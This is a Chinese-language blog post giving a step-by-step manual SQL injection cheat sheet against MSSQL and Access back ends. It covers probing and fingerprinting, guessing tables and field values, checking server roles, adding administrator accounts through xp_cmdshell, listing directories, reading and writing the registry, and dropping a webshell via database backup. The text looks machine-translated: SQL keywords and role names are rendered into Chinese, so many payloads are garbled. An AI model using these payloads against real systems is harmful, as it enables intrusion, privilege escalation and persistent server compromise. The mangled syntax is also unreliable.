黑狼's blog | 关注网络安全

手工脚本注入 
1，判断是否有注入;和1 = 1和1 = 2

2，初步判断是否是mssql的;和用户> 0

3，注入参数是字符'[查询条件]，并与'' =' 

4，搜索时没过滤参数的'[查询条件]，然后和'％25'=' 

5，判断数据库系统 
以及（从sysobjects中SELECT COUNT（*））> 0 MSSQL
及（SELECT COUNT（*）FROM MSysObjects资料）> 0访问 

6猜数据库;和（SELECT COUNT（*）FROM [数据库名]）> 0

7，猜字段;和（SELECT COUNT（字段名）从数据库名）> 0

8猜字段中记录长度;和（选取前1 LEN（字段名）从数据库名）> 0

9。（1）猜字段的ASCII值（访问） 
以及（从数据库中选择顶部1 ASC（MID（字段名，1,1））名）> 0

（2）猜字段的ASCII码值（MSSQL） 
及（选择顶部1的unicode（子串（字段名，1,1））从数据库名）> 0

10，测试权限结构（MSSQL） 
和1 =（选择IS_SRVROLEMEMBER（'系统管理员'））;  -  
和1 =（选择IS_SRVROLEMEMBER（'的ServerAdmin'））;  -  
和1 =（选择IS_SRVROLEMEMBER（'setupadmin'））;  -  
和1 =（选择IS_SRVROLEMEMBER（'securityadmin'））;  -  
和1 =（选择IS_SRVROLEMEMBER（'具有diskadmin'））;  -  
和1 =（选择IS_SRVROLEMEMBER（'bulkadmin'））;  -  
和1 =（选择IS_MEMBER（'的db_owner'））;  -  

11，添加mssql的和系统的帐户 
; EXEC master.dbo.sp_addlogin用户名;  -  

; EXEC master.dbo.sp_password空，用户名，密码;  -  

; EXEC master.dbo.sp_addsrvrolemember系统管理员的用户名;  -  

; EXEC master.dbo.xp_cmdshell'net user用户名密码 
/工作站：* /时间：所有/ PASSWORDCHG：是/ PASSWORDREQ：是/活动：是/添加';  -  

; EXEC master.dbo.xp_cmdshell'net user用户名密码/添加';  -  

; EXEC master.dbo.xp_cmdshell'净本地管理员的用户名/添加';  -  

12（1）遍历目录 

;创建表显示目录（路径为varchar（100），ID INT） 
;插入迪尔斯EXEC master.dbo.xp_dirtree'C：\' 
及（选择迪尔斯顶部1路）> 0
;和>（从显示目录路径的地方不是在（'上步得到的路径'）选择顶部1路）） 

（2）遍历目录 
;创建临时表（ID为nvarchar（255），NUM1为nvarchar（255），num2的数据类型为nvarchar（255），NUM3为nvarchar（255））;  -  
;插入温度EXEC master.dbo.xp_availablemedia;  - 获得当前所有驱动器 
;插入温度（ID）EXEC master.dbo.xp_subdirs'C：\';  - 获得子目录列表 
;插入温度（身份证，NUM1）EXEC master.dbo.xp_dirtree'C：\';  - 获得所有子目录的目录树构 
;插入温度（ID）EXEC master.dbo.xp_cmdshell'键入c：\ WEB \ INDEX.ASP';  - 查看文件的内容 

13.mssql中的存储过程 

xp_regenumvalues注册表根键，子键 
; EXEC xp_regenumvalues'HKEY_LOCAL_MACHINE'，'SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION \运行'以多个记录集方式返回所有键值 

xp_regread根键，子键，键值名 
;的exec xp_regread
'HKEY_LOCAL_MACHINE'，'SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION'，'CommonFilesDir'返回制定键的值 

xp_regwrite根键，子键，值名，值类型，值 
值类型有2种REG_SZ表示字符型，REG_DWORD表示整型 
; EXEC xp_regwrite'HKEY_LOCAL_MACHINE'，'SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION'，'TestValueName'，'REG_SZ'，'你好'写入注册表 

xp_regdeletevalue根键，子键，值名 

EXEC xp_regdeletevalue'HKEY_LOCAL_MACHINE'，'SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION'，'TestValueName'删除某个值 

xp_regdeletekey'HKEY_LOCAL_MACHINE'，'SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION \ Testkey'删除键，包括该键下所有值 

14.mssql的备份创建的webshell
使用模型 
创建表的CMD（STR图像）; 
插入CMD（STR）的值（''）; 
备份数据库模型到磁盘='C：\ l.asp'; 

15.mssql内置函数 
及（SELECT @ @ VERSION）> 0获得的Windows的版本号 
;而user_name（）='dbo'上判断当前系统的连接用户是不是SA
及（选择USER_NAME（））> 0爆当前系统的连接用户 
及（选择DB_NAME（））> 0得到当前连接的数据库 

16。简洁的WEBSHELL

使用模型 

创建表的CMD（STR图像）; 

插入CMD（STR）的值（''）; 

备份数据库模型到磁盘='G：\ wwwtest \ l.asp';